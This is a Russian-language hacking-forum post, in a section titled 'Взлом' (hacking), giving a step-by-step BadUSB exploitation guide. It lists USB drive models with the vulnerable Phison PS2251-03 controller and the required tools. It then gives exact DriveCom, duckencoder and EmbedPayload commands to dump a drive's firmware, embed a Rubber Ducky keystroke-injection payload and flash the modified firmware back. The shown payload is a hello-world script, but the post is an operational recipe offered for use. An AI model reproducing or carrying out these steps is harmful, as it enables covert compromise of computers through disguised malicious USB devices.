1. Do you speak English? Use the English version of the site! Link
    Скрыть объявление
Скрыть объявление
Здравствуй гость! После регистрации на ресурсе, ты сможешь скачивать материалы с форума и участвовать в его жизни! Для регистрации откройте соответствующую форму или нажмите на эту ссылку.

Эксплуатация badusb

Тема в разделе "Взлом", создана пользователем AnGel, 02.10.2015.

  1. AnGel

    AnGel Администратор
    Команда форума

    Дек 09 2016 в 11:32
    Регистрация:
    27.08.2015
    Сообщения:
    1.792
    Симпатии:
    1.312
    Флэш-накопители в которых установлен поддерживаемый контроллер. Но учтите что иногда в одну и ту же модель производитель может установить разные контроллеры:


    • Список основан на откликах пользователей, которые обнаружили в приведенных ниже моделях флэш-накопителей поддерживаемый контроллер (PS2251-03 (2303)):
    • Patriot 8GB Supersonic Xpress*
    • Kingston DataTraveler 3.0 T111 8GB
    • Silicon power marvel M60 64GB
    • Patriot Stellar 64 Gb Phison
    • Toshiba TransMemory-MX USB 3.0 16GB
    • Toshiba TransMemory-MX USB 3.0 8GB
    • Kingston DataTraveler G4 64 GB
    • Patriot PSF16GXPUSB Supersonic Xpress 16GB
    • Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K)**
    • Kingston Digital 8GB USB 3.0 DataTraveler (DT100G3/8GB)* - Using PS2251-03 (Программа DriveCom.exe не работает для этой флэшки, вам понадобится Phison MPALL Tools для прошивки.)
    * Иногда в этой модели может стоять чип PS2251-07
    **Пользователь Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! сообщил что во флешке Silicon Power 32GB Blaze B30 иногда устанавливают чип Phison PS2306который не поддерживается на данный момент


    • Пользователи сообщили что на приведенных ниже флэш-накопителях с контроллером PS2251-03 (2303) не получилось загрузиться с прошивкой 1.03.53:
    • SanDisk Ultra 16Gb USB 3.0 SDCZ48-016G


    • Не поддерживаемые устройства:
    • Все устройства на контроллерах Phison использующие USB 2.0
    • Kingston Digital 8GB USB 3.0 DataTraveler (DT100G3/8GB) - PS2251-07

    Необходимое ПО:

    • Visual Studio 2012 Express (для компиляции инструментов. Не обязательно) - Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    • SDCC (Small Device C Compiler) (для создания прошивок и патчей. Обязательно)* - Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    • Java Runtime Environment 7 (для запуска Duckencoder.jar) - Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    • Duckencoder.jar (для компиляции скриптов Rubberry Ducky) - Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    *SDCC обязательно ставить в папку "C:\Program Files\SDCC" !!!

    • Кастомные прошивки и программы прошивальщики - Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    • Оригинальные утилиты (вроде MPALL) а также образы и прошивки - Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    • Образы и прошивки для PS2251-03 (прямая ссылка) - Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    • Утилита для извлечения информации о флэшке (Flash Drive Information Extractor) - Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    В этом архиве содержаться скомпилированные файлы программ-прошивальщиков и уже пропатченные прошивки (об этом файле я говорил в видео): Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!

    Все команды ниже будут действовать в случае если будут установлены все программы (кроме visual studio) о которых я говорил в ролике и давал на них ссылки на форуме

    Если вы разместили папку fw из архива не в корне диска C: а где-то в другом месте, то измените пути в командах!

    Если у вас будут другие файлы BN (BN03V114M.BIN) то замените удалите содержимое папки C:\fw\fw_bn и загрузите туда ваши файлы при этом изменив их имена в командах.

    Переводим флешку в boot-режим:
    Код:
    C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=SetBootMode
    Отправляем на флешку burner-image:
    Код:
    C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=SendExecutable /burner=C:\fw\fw_bn\BN03V114M.BIN
    Извлекаем и сохраняем текущую прошивку с флешки:
    Код:
    C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=DumpFirmware /firmware=C:\fw\currentfw.bin
    Создаю HID Payload:
    Код:
    java -jar C:\fw\ducky\duckencode.jar -i C:\fw\ducky\hello_world.txt -o C:\fw\ducky\inject.bin
    Внедряю HID Payload в прошивку:
    Код:
    C:\fw\Psychson-master\tools\EmbedPayload.exe C:\fw\ducky\inject.bin C:\fw\Psychson-master\firmware\bin\fw.bin
    Зашиваю прошивку с внедренным HID Payload:
    Код:
    C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=SendFirmware /burner=C:\fw\fw_bn\BN03V114M.BIN /firmware=C:\fw\Psychson-master\firmware\bin\fw.bin

    Далее идет описание каждой папки (элемента) из репозитория на GitHub (см. ссылку выше).

    Phison 2251-03 (2303) Создание собственной (кастомной) прошивки & Изменение существующих прошивок (патчинг)

    • Репозиторий содержит следующие элементы (папки):
    • DriveCom – PC C# приложение для связи с дисками на контроллере Phison.
    • EmbedPayload – PC C# приложение для внедрения скриптов Rubber Ducky inject.bin в кастомную прошивку для дальнейшего выполнения.
    • Injector – PC C# приложение как для извлечения кода прошивки так и для добавления/изменения кода существующей прошивки.
    • Firmware – Прошивка для 8051* написанная на C.
    • Patch – Коллекция патчей для 8051* написанных на C.

    • Релиз содержит следующие элементы (папки):
    • Patch – Коллекция патчей для 8051* написанных на C.
    • Tools – Скомпилированные бинарные файлы всех приложений.
    • CFW.bin – Кастомная прошивка содержащая встроенный HID payload (модуль на Rubbery Ducky).

    Заметьте – кастомные и патченные прошивки тестировались только на контроллере PS2251-03 версии 1.03.53 (подходящей только для 8K eD3 NAND флэш-памяти). Прошивки могут работать также и на других контроллерах и с другой NAND флэш-памятью, но будьте осторожны!

    Если вы используете соответствующую прошивку для вашего контроллера и NAND-памяти то понижение прошивки не нанесет никакого вреда (например, понижение с 1.10.53).

    Предупреждение: Это экспериментальное программное обеспечение. Использование на не поддерживаемых устройствах или даже на поддерживаемых, может привести к потере информации, или повреждению самого устройства. Используйте на свой страх и риск.

    *8051 - это встроенный в контроллер 8-и битный микропроцессор

    Для реализации уязвимости я использовал флешку Silicon Power Marvel M60 на контроллере PS-2251-03-Q:
    1f0fa7fd49608eae0694e69a607765b1._.jpg